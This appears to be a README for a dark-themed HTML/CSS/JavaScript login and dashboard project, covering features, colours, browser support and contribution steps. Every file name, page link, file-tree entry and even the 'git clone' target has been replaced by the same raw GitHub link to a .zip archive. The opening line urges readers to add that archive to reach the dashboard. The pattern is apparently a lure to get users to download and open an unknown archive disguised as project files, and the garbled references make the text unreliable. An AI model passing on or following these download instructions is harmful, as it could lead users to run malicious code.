add https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip to acces the dashboard
A beautiful, responsive authentication system with a modern dashboard built with HTML, CSS, and JavaScript. Features dark theme with red accents, glassmorphism effects, and smooth animations.
- Dark Theme with red accent colors
- Glassmorphism effects with backdrop blur
- Semi-transparent containers for better visual depth
- Smooth animations and micro-interactions
- Responsive design for all devices
- Login Page (
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
) - Clean sign-in form - Register Page (
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
) - User registration with validation - Password visibility toggle with emoji icons
- Form validation with real-time feedback
- Loading states with spinning animations
- Modern sidebar with navigation
- Statistics cards with animated counters
- Recent activity feed
- Quick action buttons
- Responsive layout with mobile support
-
Clone the repository
git clone https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip cd modern-auth-dashboard
-
Open in browser
- Open
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
for the login page - Navigate to
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
for registration - Access
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
for the dashboard
- Open
modern-auth-dashboard/
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Login page
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Registration page
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Dashboard
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Login/Register styles
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Dashboard styles
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Login/Register JavaScript
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # Dashboard JavaScript
βββ https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip # This file
- Clean login form with email and password
- Registration form with full name, email, and password confirmation
- Password visibility toggle using emoji icons
- Form validation with error handling
- Loading animations during form submission
- Sidebar navigation with active states
- Statistics overview with animated counters
- Recent activity timeline
- Quick action buttons for common tasks
- User profile display
- Logout functionality with redirect
- Dark theme with red accent colors
- Blur effects and animated background elements
- Glassmorphism cards with transparency
- Box shadows for depth perception
- Hover effects and smooth transitions
- Primary Background:
#0a0a0a
(Almost black) - Secondary Background:
rgba(26, 26, 26, 0.8)
(Semi-transparent dark) - Accent Color:
#dc2626
(Red) - Text Primary:
#ffffff
(White) - Text Secondary:
#a0a0a0
(Light gray)
- Desktop: Full sidebar layout with main content
- Tablet: Adaptive grid layouts
- Mobile: Stacked layout with touch-friendly buttons
- Touch support for mobile devices
- HTML5 - Semantic markup
- CSS3 - Modern styling with custom properties
- JavaScript (ES6+) - Interactive functionality
- CSS Grid & Flexbox - Responsive layouts
- CSS Animations - Smooth transitions and effects
- Entrance animations for form elements
- Hover effects on buttons and cards
- Loading states with spinning indicators
- Floating background blur elements
- Button click feedback animations
- β Chrome 80+
- β Firefox 75+
- β Safari 13+
- β Edge 80+
- Open
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
- Enter email and password
- Click "Sign In" button
- View loading animation
- See success notification
- Navigate to
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
- Fill in all required fields
- Confirm password matches
- Submit form
- Receive confirmation
- Access
https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
- Use sidebar for navigation
- View statistics and activity
- Use quick action buttons
- Logout when finished
Edit CSS variables in https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
and https://raw.githubusercontent.com/mariostnc/NUNIX_SNBody_Docs/main/inflexed/NUNIX_SNBody_Docs.zip
:
:root {
--accent-primary: #dc2626; /* Red accent */
--bg-primary: #0a0a0a; /* Dark background */
--text-primary: #ffffff; /* White text */
}
Modify animation durations:
.auth-card {
transition: all 0.3s ease; /* Change timing */
}
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing-feature
) - Commit your changes (
git commit -m 'Add amazing feature'
) - Push to the branch (
git push origin feature/amazing-feature
) - Open a Pull Request
This project is licensed under the MIT License - see the LICENSE file for details.
- Glassmorphism design inspiration
- Modern CSS techniques
- Responsive design best practices
- Accessibility considerations
Enjoy the modern authentication experience! π